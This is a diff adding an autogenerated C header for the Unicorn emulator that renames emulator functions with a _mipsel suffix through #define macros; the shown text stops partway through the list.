@@ -0,0 +1,3928 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_MIPSEL_H +#define UNICORN_AUTOGEN_MIPSEL_H +#define arm_release arm_release_mipsel +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_mipsel +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_mipsel +#define use_idiv_instructions_rt use_idiv_instructions_rt_mipsel +#define tcg_target_deposit_valid 
tcg_target_deposit_valid_mipsel +#define helper_power_down helper_power_down_mipsel +#define check_exit_request check_exit_request_mipsel +#define address_space_unregister address_space_unregister_mipsel +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mipsel +#define phys_mem_clean phys_mem_clean_mipsel +#define tb_cleanup tb_cleanup_mipsel +#define memory_map memory_map_mipsel +#define memory_map_ptr memory_map_ptr_mipsel +#define memory_unmap memory_unmap_mipsel +#define memory_free memory_free_mipsel +#define free_code_gen_buffer free_code_gen_buffer_mipsel +#define helper_raise_exception helper_raise_exception_mipsel +#define tcg_enabled tcg_enabled_mipsel +#define tcg_exec_init tcg_exec_init_mipsel +#define memory_register_types memory_register_types_mipsel +#define cpu_exec_init_all cpu_exec_init_all_mipsel +#define vm_start vm_start_mipsel +#define resume_all_vcpus resume_all_vcpus_mipsel +#define a15_l2ctlr_read a15_l2ctlr_read_mipsel +#define a64_translate_init a64_translate_init_mipsel +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_mipsel +#define aa64_cacheop_access aa64_cacheop_access_mipsel +#define aa64_daif_access aa64_daif_access_mipsel +#define aa64_daif_write aa64_daif_write_mipsel +#define aa64_dczid_read aa64_dczid_read_mipsel +#define aa64_fpcr_read aa64_fpcr_read_mipsel +#define aa64_fpcr_write aa64_fpcr_write_mipsel +#define aa64_fpsr_read aa64_fpsr_read_mipsel +#define aa64_fpsr_write aa64_fpsr_write_mipsel +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_mipsel +#define aa64_zva_access aa64_zva_access_mipsel +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_mipsel +#define aarch64_restore_sp aarch64_restore_sp_mipsel +#define aarch64_save_sp aarch64_save_sp_mipsel +#define accel_find accel_find_mipsel +#define accel_init_machine accel_init_machine_mipsel +#define accel_type accel_type_mipsel +#define access_with_adjusted_size access_with_adjusted_size_mipsel 
+#define add128 add128_mipsel +#define add16_sat add16_sat_mipsel +#define add16_usat add16_usat_mipsel +#define add192 add192_mipsel +#define add8_sat add8_sat_mipsel +#define add8_usat add8_usat_mipsel +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_mipsel +#define add_cpreg_to_list add_cpreg_to_list_mipsel +#define addFloat128Sigs addFloat128Sigs_mipsel +#define addFloat32Sigs addFloat32Sigs_mipsel +#define addFloat64Sigs addFloat64Sigs_mipsel +#define addFloatx80Sigs addFloatx80Sigs_mipsel +#define add_qemu_ldst_label add_qemu_ldst_label_mipsel +#define address_space_access_valid address_space_access_valid_mipsel +#define address_space_destroy address_space_destroy_mipsel +#define address_space_destroy_dispatch address_space_destroy_dispatch_mipsel +#define address_space_get_flatview address_space_get_flatview_mipsel +#define address_space_init address_space_init_mipsel +#define address_space_init_dispatch address_space_init_dispatch_mipsel +#define address_space_lookup_region address_space_lookup_region_mipsel +#define address_space_map address_space_map_mipsel +#define address_space_read address_space_read_mipsel +#define address_space_rw address_space_rw_mipsel +#define address_space_translate address_space_translate_mipsel +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_mipsel +#define address_space_translate_internal address_space_translate_internal_mipsel +#define address_space_unmap address_space_unmap_mipsel +#define address_space_update_topology address_space_update_topology_mipsel +#define address_space_update_topology_pass address_space_update_topology_pass_mipsel +#define address_space_write address_space_write_mipsel +#define addrrange_contains addrrange_contains_mipsel +#define addrrange_end addrrange_end_mipsel +#define addrrange_equal addrrange_equal_mipsel +#define addrrange_intersection addrrange_intersection_mipsel +#define addrrange_intersects addrrange_intersects_mipsel +#define addrrange_make 
addrrange_make_mipsel +#define adjust_endianness adjust_endianness_mipsel +#define all_helpers all_helpers_mipsel +#define alloc_code_gen_buffer alloc_code_gen_buffer_mipsel +#define alloc_entry alloc_entry_mipsel +#define always_true always_true_mipsel +#define arm1026_initfn arm1026_initfn_mipsel +#define arm1136_initfn arm1136_initfn_mipsel +#define arm1136_r2_initfn arm1136_r2_initfn_mipsel +#define arm1176_initfn arm1176_initfn_mipsel +#define arm11mpcore_initfn arm11mpcore_initfn_mipsel +#define arm926_initfn arm926_initfn_mipsel +#define arm946_initfn arm946_initfn_mipsel +#define arm_ccnt_enabled arm_ccnt_enabled_mipsel +#define arm_cp_read_zero arm_cp_read_zero_mipsel +#define arm_cp_reset_ignore arm_cp_reset_ignore_mipsel +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_mipsel +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_mipsel +#define arm_cpu_finalizefn arm_cpu_finalizefn_mipsel +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_mipsel +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_mipsel +#define arm_cpu_initfn arm_cpu_initfn_mipsel +#define arm_cpu_list arm_cpu_list_mipsel +#define cpu_loop_exit cpu_loop_exit_mipsel +#define arm_cpu_post_init arm_cpu_post_init_mipsel +#define arm_cpu_realizefn arm_cpu_realizefn_mipsel +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_mipsel +#define arm_cpu_register_types arm_cpu_register_types_mipsel +#define cpu_resume_from_signal cpu_resume_from_signal_mipsel +#define arm_cpus arm_cpus_mipsel +#define arm_cpu_set_pc arm_cpu_set_pc_mipsel +#define arm_cp_write_ignore arm_cp_write_ignore_mipsel +#define arm_current_el arm_current_el_mipsel +#define arm_dc_feature arm_dc_feature_mipsel +#define arm_debug_excp_handler arm_debug_excp_handler_mipsel +#define arm_debug_target_el arm_debug_target_el_mipsel +#define arm_el_is_aa64 arm_el_is_aa64_mipsel +#define arm_env_get_cpu arm_env_get_cpu_mipsel +#define arm_excp_target_el 
arm_excp_target_el_mipsel +#define arm_excp_unmasked arm_excp_unmasked_mipsel +#define arm_feature arm_feature_mipsel +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_mipsel +#define gen_intermediate_code gen_intermediate_code_mipsel +#define gen_intermediate_code_pc gen_intermediate_code_pc_mipsel +#define arm_gen_test_cc arm_gen_test_cc_mipsel +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_mipsel +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_mipsel +#define arm_handle_psci_call arm_handle_psci_call_mipsel +#define arm_is_psci_call arm_is_psci_call_mipsel +#define arm_is_secure arm_is_secure_mipsel +#define arm_is_secure_below_el3 arm_is_secure_below_el3_mipsel +#define arm_ldl_code arm_ldl_code_mipsel +#define arm_lduw_code arm_lduw_code_mipsel +#define arm_log_exception arm_log_exception_mipsel +#define arm_reg_read arm_reg_read_mipsel +#define arm_reg_reset arm_reg_reset_mipsel +#define arm_reg_write arm_reg_write_mipsel +#define restore_state_to_opc restore_state_to_opc_mipsel +#define arm_rmode_to_sf arm_rmode_to_sf_mipsel +#define arm_singlestep_active arm_singlestep_active_mipsel +#define tlb_fill tlb_fill_mipsel +#define tlb_flush tlb_flush_mipsel +#define tlb_flush_page tlb_flush_page_mipsel +#define tlb_set_page tlb_set_page_mipsel +#define arm_translate_init arm_translate_init_mipsel +#define arm_v7m_class_init arm_v7m_class_init_mipsel +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_mipsel +#define ats_access ats_access_mipsel +#define ats_write ats_write_mipsel +#define bad_mode_switch bad_mode_switch_mipsel +#define bank_number bank_number_mipsel +#define bitmap_zero_extend bitmap_zero_extend_mipsel +#define bp_wp_matches bp_wp_matches_mipsel +#define breakpoint_invalidate breakpoint_invalidate_mipsel +#define build_page_bitmap build_page_bitmap_mipsel +#define bus_add_child bus_add_child_mipsel +#define bus_class_init bus_class_init_mipsel +#define bus_info bus_info_mipsel +#define bus_unparent bus_unparent_mipsel +#define 
cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_mipsel +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_mipsel +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_mipsel +#define call_recip_estimate call_recip_estimate_mipsel +#define can_merge can_merge_mipsel +#define capacity_increase capacity_increase_mipsel +#define ccsidr_read ccsidr_read_mipsel +#define check_ap check_ap_mipsel +#define check_breakpoints check_breakpoints_mipsel +#define check_watchpoints check_watchpoints_mipsel +#define cho cho_mipsel +#define clear_bit clear_bit_mipsel +#define clz32 clz32_mipsel +#define clz64 clz64_mipsel +#define cmp_flatrange_addr cmp_flatrange_addr_mipsel +#define code_gen_alloc code_gen_alloc_mipsel +#define commonNaNToFloat128 commonNaNToFloat128_mipsel +#define commonNaNToFloat16 commonNaNToFloat16_mipsel +#define commonNaNToFloat32 commonNaNToFloat32_mipsel +#define commonNaNToFloat64 commonNaNToFloat64_mipsel +#define commonNaNToFloatx80 commonNaNToFloatx80_mipsel +#define compute_abs_deadline compute_abs_deadline_mipsel +#define cond_name cond_name_mipsel +#define configure_accelerator configure_accelerator_mipsel +#define container_get container_get_mipsel +#define container_info container_info_mipsel +#define container_register_types container_register_types_mipsel +#define contextidr_write contextidr_write_mipsel +#define core_log_global_start core_log_global_start_mipsel +#define core_log_global_stop core_log_global_stop_mipsel +#define core_memory_listener core_memory_listener_mipsel +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_mipsel +#define cortex_a15_initfn cortex_a15_initfn_mipsel +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_mipsel +#define cortex_a8_initfn cortex_a8_initfn_mipsel +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_mipsel +#define cortex_a9_initfn cortex_a9_initfn_mipsel +#define cortex_m3_initfn cortex_m3_initfn_mipsel +#define count_cpreg count_cpreg_mipsel +#define countLeadingZeros32 
countLeadingZeros32_mipsel +#define countLeadingZeros64 countLeadingZeros64_mipsel +#define cp_access_ok cp_access_ok_mipsel +#define cpacr_write cpacr_write_mipsel +#define cpreg_field_is_64bit cpreg_field_is_64bit_mipsel +#define cp_reginfo cp_reginfo_mipsel +#define cpreg_key_compare cpreg_key_compare_mipsel +#define cpreg_make_keylist cpreg_make_keylist_mipsel +#define cp_reg_reset cp_reg_reset_mipsel +#define cpreg_to_kvm_id cpreg_to_kvm_id_mipsel +#define cpsr_read cpsr_read_mipsel +#define cpsr_write cpsr_write_mipsel +#define cptype_valid cptype_valid_mipsel +#define cpu_abort cpu_abort_mipsel +#define cpu_arm_exec cpu_arm_exec_mipsel +#define cpu_arm_gen_code cpu_arm_gen_code_mipsel +#define cpu_arm_init cpu_arm_init_mipsel +#define cpu_breakpoint_insert cpu_breakpoint_insert_mipsel +#define cpu_breakpoint_remove cpu_breakpoint_remove_mipsel +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mipsel +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mipsel +#define cpu_can_do_io cpu_can_do_io_mipsel +#define cpu_can_run cpu_can_run_mipsel +#define cpu_class_init cpu_class_init_mipsel +#define cpu_common_class_by_name cpu_common_class_by_name_mipsel +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_mipsel +#define cpu_common_get_arch_id cpu_common_get_arch_id_mipsel +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_mipsel +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_mipsel +#define cpu_common_has_work cpu_common_has_work_mipsel +#define cpu_common_initfn cpu_common_initfn_mipsel +#define cpu_common_noop cpu_common_noop_mipsel +#define cpu_common_parse_features cpu_common_parse_features_mipsel +#define cpu_common_realizefn cpu_common_realizefn_mipsel +#define cpu_common_reset cpu_common_reset_mipsel +#define cpu_dump_statistics cpu_dump_statistics_mipsel +#define cpu_exec_init cpu_exec_init_mipsel +#define cpu_flush_icache_range cpu_flush_icache_range_mipsel +#define cpu_gen_init 
cpu_gen_init_mipsel +#define cpu_get_clock cpu_get_clock_mipsel +#define cpu_get_real_ticks cpu_get_real_ticks_mipsel +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_mipsel +#define cpu_handle_debug_exception cpu_handle_debug_exception_mipsel +#define cpu_handle_guest_debug cpu_handle_guest_debug_mipsel +#define cpu_inb cpu_inb_mipsel +#define cpu_inl cpu_inl_mipsel +#define cpu_interrupt cpu_interrupt_mipsel +#define cpu_interrupt_handler cpu_interrupt_handler_mipsel +#define cpu_inw cpu_inw_mipsel +#define cpu_io_recompile cpu_io_recompile_mipsel +#define cpu_is_stopped cpu_is_stopped_mipsel +#define cpu_ldl_code cpu_ldl_code_mipsel +#define cpu_ldub_code cpu_ldub_code_mipsel +#define cpu_lduw_code cpu_lduw_code_mipsel +#define cpu_memory_rw_debug cpu_memory_rw_debug_mipsel +#define cpu_mmu_index cpu_mmu_index_mipsel +#define cpu_outb cpu_outb_mipsel +#define cpu_outl cpu_outl_mipsel +#define cpu_outw cpu_outw_mipsel +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_mipsel +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_mipsel +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_mipsel +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_mipsel +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_mipsel +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_mipsel +#define cpu_physical_memory_map cpu_physical_memory_map_mipsel +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_mipsel +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_mipsel +#define cpu_physical_memory_rw cpu_physical_memory_rw_mipsel +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_mipsel +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_mipsel +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_mipsel +#define cpu_physical_memory_write_rom 
cpu_physical_memory_write_rom_mipsel +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_mipsel +#define cpu_register cpu_register_mipsel +#define cpu_register_types cpu_register_types_mipsel +#define cpu_restore_state cpu_restore_state_mipsel +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_mipsel +#define cpu_single_step cpu_single_step_mipsel +#define cpu_tb_exec cpu_tb_exec_mipsel +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_mipsel +#define cpu_to_be64 cpu_to_be64_mipsel +#define cpu_to_le32 cpu_to_le32_mipsel +#define cpu_to_le64 cpu_to_le64_mipsel +#define cpu_type_info cpu_type_info_mipsel +#define cpu_unassigned_access cpu_unassigned_access_mipsel +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mipsel +#define cpu_watchpoint_insert cpu_watchpoint_insert_mipsel +#define cpu_watchpoint_remove cpu_watchpoint_remove_mipsel +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mipsel +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mipsel +#define crc32c_table crc32c_table_mipsel +#define create_new_memory_mapping create_new_memory_mapping_mipsel +#define csselr_write csselr_write_mipsel +#define cto32 cto32_mipsel +#define ctr_el0_access ctr_el0_access_mipsel +#define ctz32 ctz32_mipsel +#define ctz64 ctz64_mipsel +#define dacr_write dacr_write_mipsel +#define dbgbcr_write dbgbcr_write_mipsel +#define dbgbvr_write dbgbvr_write_mipsel +#define dbgwcr_write dbgwcr_write_mipsel +#define dbgwvr_write dbgwvr_write_mipsel +#define debug_cp_reginfo debug_cp_reginfo_mipsel +#define debug_frame debug_frame_mipsel +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_mipsel +#define define_arm_cp_regs define_arm_cp_regs_mipsel +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_mipsel +#define define_debug_regs define_debug_regs_mipsel +#define define_one_arm_cp_reg define_one_arm_cp_reg_mipsel +#define define_one_arm_cp_reg_with_opaque 
define_one_arm_cp_reg_with_opaque_mipsel +#define deposit32 deposit32_mipsel +#define deposit64 deposit64_mipsel +#define deregister_tm_clones deregister_tm_clones_mipsel +#define device_class_base_init device_class_base_init_mipsel +#define device_class_init device_class_init_mipsel +#define device_finalize device_finalize_mipsel +#define device_get_realized device_get_realized_mipsel +#define device_initfn device_initfn_mipsel +#define device_post_init device_post_init_mipsel +#define device_reset device_reset_mipsel +#define device_set_realized device_set_realized_mipsel +#define device_type_info device_type_info_mipsel +#define disas_arm_insn disas_arm_insn_mipsel +#define disas_coproc_insn disas_coproc_insn_mipsel +#define disas_dsp_insn disas_dsp_insn_mipsel +#define disas_iwmmxt_insn disas_iwmmxt_insn_mipsel +#define disas_neon_data_insn disas_neon_data_insn_mipsel +#define disas_neon_ls_insn disas_neon_ls_insn_mipsel +#define disas_thumb2_insn disas_thumb2_insn_mipsel +#define disas_thumb_insn disas_thumb_insn_mipsel +#define disas_vfp_insn disas_vfp_insn_mipsel +#define disas_vfp_v8_insn disas_vfp_v8_insn_mipsel +#define do_arm_semihosting do_arm_semihosting_mipsel +#define do_clz16 do_clz16_mipsel +#define do_clz8 do_clz8_mipsel +#define do_constant_folding do_constant_folding_mipsel +#define do_constant_folding_2 do_constant_folding_2_mipsel +#define do_constant_folding_cond do_constant_folding_cond_mipsel +#define do_constant_folding_cond2 do_constant_folding_cond2_mipsel +#define do_constant_folding_cond_32 do_constant_folding_cond_32_mipsel +#define do_constant_folding_cond_64 do_constant_folding_cond_64_mipsel +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_mipsel +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_mipsel +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_mipsel +#define do_ssat do_ssat_mipsel +#define do_usad do_usad_mipsel +#define do_usat do_usat_mipsel +#define do_v7m_exception_exit do_v7m_exception_exit_mipsel +#define 
dummy_c15_cp_reginfo dummy_c15_cp_reginfo_mipsel +#define dummy_func dummy_func_mipsel +#define dummy_section dummy_section_mipsel +#define _DYNAMIC _DYNAMIC_mipsel +#define _edata _edata_mipsel +#define _end _end_mipsel +#define end_list end_list_mipsel +#define eq128 eq128_mipsel +#define ErrorClass_lookup ErrorClass_lookup_mipsel +#define error_copy error_copy_mipsel +#define error_exit error_exit_mipsel +#define error_get_class error_get_class_mipsel +#define error_get_pretty error_get_pretty_mipsel +#define error_setg_file_open error_setg_file_open_mipsel +#define estimateDiv128To64 estimateDiv128To64_mipsel +#define estimateSqrt32 estimateSqrt32_mipsel +#define excnames excnames_mipsel +#define excp_is_internal excp_is_internal_mipsel +#define extended_addresses_enabled extended_addresses_enabled_mipsel +#define extended_mpu_ap_bits extended_mpu_ap_bits_mipsel +#define extract32 extract32_mipsel +#define extract64 extract64_mipsel +#define extractFloat128Exp extractFloat128Exp_mipsel +#define extractFloat128Frac0 extractFloat128Frac0_mipsel +#define extractFloat128Frac1 extractFloat128Frac1_mipsel +#define extractFloat128Sign extractFloat128Sign_mipsel +#define extractFloat16Exp extractFloat16Exp_mipsel +#define extractFloat16Frac extractFloat16Frac_mipsel +#define extractFloat16Sign extractFloat16Sign_mipsel +#define extractFloat32Exp extractFloat32Exp_mipsel +#define extractFloat32Frac extractFloat32Frac_mipsel +#define extractFloat32Sign extractFloat32Sign_mipsel +#define extractFloat64Exp extractFloat64Exp_mipsel +#define extractFloat64Frac extractFloat64Frac_mipsel +#define extractFloat64Sign extractFloat64Sign_mipsel +#define extractFloatx80Exp extractFloatx80Exp_mipsel +#define extractFloatx80Frac extractFloatx80Frac_mipsel +#define extractFloatx80Sign extractFloatx80Sign_mipsel +#define fcse_write fcse_write_mipsel +#define find_better_copy find_better_copy_mipsel +#define find_default_machine find_default_machine_mipsel +#define find_desc_by_name 
find_desc_by_name_mipsel +#define find_first_bit find_first_bit_mipsel +#define find_paging_enabled_cpu find_paging_enabled_cpu_mipsel +#define find_ram_block find_ram_block_mipsel +#define find_ram_offset find_ram_offset_mipsel +#define find_string find_string_mipsel +#define find_type find_type_mipsel +#define _fini _fini_mipsel +#define flatrange_equal flatrange_equal_mipsel +#define flatview_destroy flatview_destroy_mipsel +#define flatview_init flatview_init_mipsel +#define flatview_insert flatview_insert_mipsel +#define flatview_lookup flatview_lookup_mipsel +#define flatview_ref flatview_ref_mipsel +#define flatview_simplify flatview_simplify_mipsel +#define flatview_unref flatview_unref_mipsel +#define float128_add float128_add_mipsel +#define float128_compare float128_compare_mipsel +#define float128_compare_internal float128_compare_internal_mipsel +#define float128_compare_quiet float128_compare_quiet_mipsel +#define float128_default_nan float128_default_nan_mipsel +#define float128_div float128_div_mipsel +#define float128_eq float128_eq_mipsel +#define float128_eq_quiet float128_eq_quiet_mipsel +#define float128_is_quiet_nan float128_is_quiet_nan_mipsel +#define float128_is_signaling_nan float128_is_signaling_nan_mipsel +#define float128_le float128_le_mipsel +#define float128_le_quiet float128_le_quiet_mipsel +#define float128_lt float128_lt_mipsel +#define float128_lt_quiet float128_lt_quiet_mipsel +#define float128_maybe_silence_nan float128_maybe_silence_nan_mipsel +#define float128_mul float128_mul_mipsel +#define float128_rem float128_rem_mipsel +#define float128_round_to_int float128_round_to_int_mipsel +#define float128_scalbn float128_scalbn_mipsel +#define float128_sqrt float128_sqrt_mipsel +#define float128_sub float128_sub_mipsel +#define float128ToCommonNaN float128ToCommonNaN_mipsel +#define float128_to_float32 float128_to_float32_mipsel +#define float128_to_float64 float128_to_float64_mipsel +#define float128_to_floatx80 
float128_to_floatx80_mipsel +#define float128_to_int32 float128_to_int32_mipsel +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mipsel +#define float128_to_int64 float128_to_int64_mipsel +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mipsel +#define float128_unordered float128_unordered_mipsel +#define float128_unordered_quiet float128_unordered_quiet_mipsel +#define float16_default_nan float16_default_nan_mipsel +#define float16_is_quiet_nan float16_is_quiet_nan_mipsel +#define float16_is_signaling_nan float16_is_signaling_nan_mipsel +#define float16_maybe_silence_nan float16_maybe_silence_nan_mipsel +#define float16ToCommonNaN float16ToCommonNaN_mipsel +#define float16_to_float32 float16_to_float32_mipsel +#define float16_to_float64 float16_to_float64_mipsel +#define float32_abs float32_abs_mipsel +#define float32_add float32_add_mipsel +#define float32_chs float32_chs_mipsel +#define float32_compare float32_compare_mipsel +#define float32_compare_internal float32_compare_internal_mipsel +#define float32_compare_quiet float32_compare_quiet_mipsel +#define float32_default_nan float32_default_nan_mipsel +#define float32_div float32_div_mipsel +#define float32_eq float32_eq_mipsel +#define float32_eq_quiet float32_eq_quiet_mipsel +#define float32_exp2 float32_exp2_mipsel +#define float32_exp2_coefficients float32_exp2_coefficients_mipsel +#define float32_is_any_nan float32_is_any_nan_mipsel +#define float32_is_infinity float32_is_infinity_mipsel +#define float32_is_neg float32_is_neg_mipsel +#define float32_is_quiet_nan float32_is_quiet_nan_mipsel +#define float32_is_signaling_nan float32_is_signaling_nan_mipsel +#define float32_is_zero float32_is_zero_mipsel +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_mipsel +#define float32_le float32_le_mipsel +#define float32_le_quiet float32_le_quiet_mipsel +#define float32_log2 float32_log2_mipsel +#define float32_lt float32_lt_mipsel +#define 
float32_lt_quiet float32_lt_quiet_mipsel +#define float32_max float32_max_mipsel +#define float32_maxnum float32_maxnum_mipsel +#define float32_maxnummag float32_maxnummag_mipsel +#define float32_maybe_silence_nan float32_maybe_silence_nan_mipsel +#define float32_min float32_min_mipsel +#define float32_minmax float32_minmax_mipsel +#define float32_minnum float32_minnum_mipsel +#define float32_minnummag float32_minnummag_mipsel +#define float32_mul float32_mul_mipsel +#define float32_muladd float32_muladd_mipsel +#define float32_rem float32_rem_mipsel +#define float32_round_to_int float32_round_to_int_mipsel +#define float32_scalbn float32_scalbn_mipsel +#define float32_set_sign float32_set_sign_mipsel +#define float32_sqrt float32_sqrt_mipsel +#define float32_squash_input_denormal float32_squash_input_denormal_mipsel +#define float32_sub float32_sub_mipsel +#define float32ToCommonNaN float32ToCommonNaN_mipsel +#define float32_to_float128 float32_to_float128_mipsel +#define float32_to_float16 float32_to_float16_mipsel +#define float32_to_float64 float32_to_float64_mipsel +#define float32_to_floatx80 float32_to_floatx80_mipsel +#define float32_to_int16 float32_to_int16_mipsel +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mipsel +#define float32_to_int32 float32_to_int32_mipsel +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mipsel +#define float32_to_int64 float32_to_int64_mipsel +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mipsel +#define float32_to_uint16 float32_to_uint16_mipsel +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mipsel +#define float32_to_uint32 float32_to_uint32_mipsel +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mipsel +#define float32_to_uint64 float32_to_uint64_mipsel +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mipsel +#define float32_unordered float32_unordered_mipsel +#define 
float32_unordered_quiet float32_unordered_quiet_mipsel +#define float64_abs float64_abs_mipsel +#define float64_add float64_add_mipsel +#define float64_chs float64_chs_mipsel +#define float64_compare float64_compare_mipsel +#define float64_compare_internal float64_compare_internal_mipsel +#define float64_compare_quiet float64_compare_quiet_mipsel +#define float64_default_nan float64_default_nan_mipsel +#define float64_div float64_div_mipsel +#define float64_eq float64_eq_mipsel +#define float64_eq_quiet float64_eq_quiet_mipsel +#define float64_is_any_nan float64_is_any_nan_mipsel +#define float64_is_infinity float64_is_infinity_mipsel +#define float64_is_neg float64_is_neg_mipsel +#define float64_is_quiet_nan float64_is_quiet_nan_mipsel +#define float64_is_signaling_nan float64_is_signaling_nan_mipsel +#define float64_is_zero float64_is_zero_mipsel +#define float64_le float64_le_mipsel +#define float64_le_quiet float64_le_quiet_mipsel +#define float64_log2 float64_log2_mipsel +#define float64_lt float64_lt_mipsel +#define float64_lt_quiet float64_lt_quiet_mipsel +#define float64_max float64_max_mipsel +#define float64_maxnum float64_maxnum_mipsel +#define float64_maxnummag float64_maxnummag_mipsel +#define float64_maybe_silence_nan float64_maybe_silence_nan_mipsel +#define float64_min float64_min_mipsel +#define float64_minmax float64_minmax_mipsel +#define float64_minnum float64_minnum_mipsel +#define float64_minnummag float64_minnummag_mipsel +#define float64_mul float64_mul_mipsel +#define float64_muladd float64_muladd_mipsel +#define float64_rem float64_rem_mipsel +#define float64_round_to_int float64_round_to_int_mipsel +#define float64_scalbn float64_scalbn_mipsel +#define float64_set_sign float64_set_sign_mipsel +#define float64_sqrt float64_sqrt_mipsel +#define float64_squash_input_denormal float64_squash_input_denormal_mipsel +#define float64_sub float64_sub_mipsel +#define float64ToCommonNaN float64ToCommonNaN_mipsel +#define float64_to_float128 
float64_to_float128_mipsel +#define float64_to_float16 float64_to_float16_mipsel +#define float64_to_float32 float64_to_float32_mipsel +#define float64_to_floatx80 float64_to_floatx80_mipsel +#define float64_to_int16 float64_to_int16_mipsel +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mipsel +#define float64_to_int32 float64_to_int32_mipsel +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mipsel +#define float64_to_int64 float64_to_int64_mipsel +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mipsel +#define float64_to_uint16 float64_to_uint16_mipsel +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mipsel +#define float64_to_uint32 float64_to_uint32_mipsel +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mipsel +#define float64_to_uint64 float64_to_uint64_mipsel +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mipsel +#define float64_trunc_to_int float64_trunc_to_int_mipsel +#define float64_unordered float64_unordered_mipsel +#define float64_unordered_quiet float64_unordered_quiet_mipsel +#define float_raise float_raise_mipsel +#define floatx80_add floatx80_add_mipsel +#define floatx80_compare floatx80_compare_mipsel +#define floatx80_compare_internal floatx80_compare_internal_mipsel +#define floatx80_compare_quiet floatx80_compare_quiet_mipsel +#define floatx80_default_nan floatx80_default_nan_mipsel +#define floatx80_div floatx80_div_mipsel +#define floatx80_eq floatx80_eq_mipsel +#define floatx80_eq_quiet floatx80_eq_quiet_mipsel +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_mipsel +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_mipsel +#define floatx80_le floatx80_le_mipsel +#define floatx80_le_quiet floatx80_le_quiet_mipsel +#define floatx80_lt floatx80_lt_mipsel +#define floatx80_lt_quiet floatx80_lt_quiet_mipsel +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_mipsel +#define 
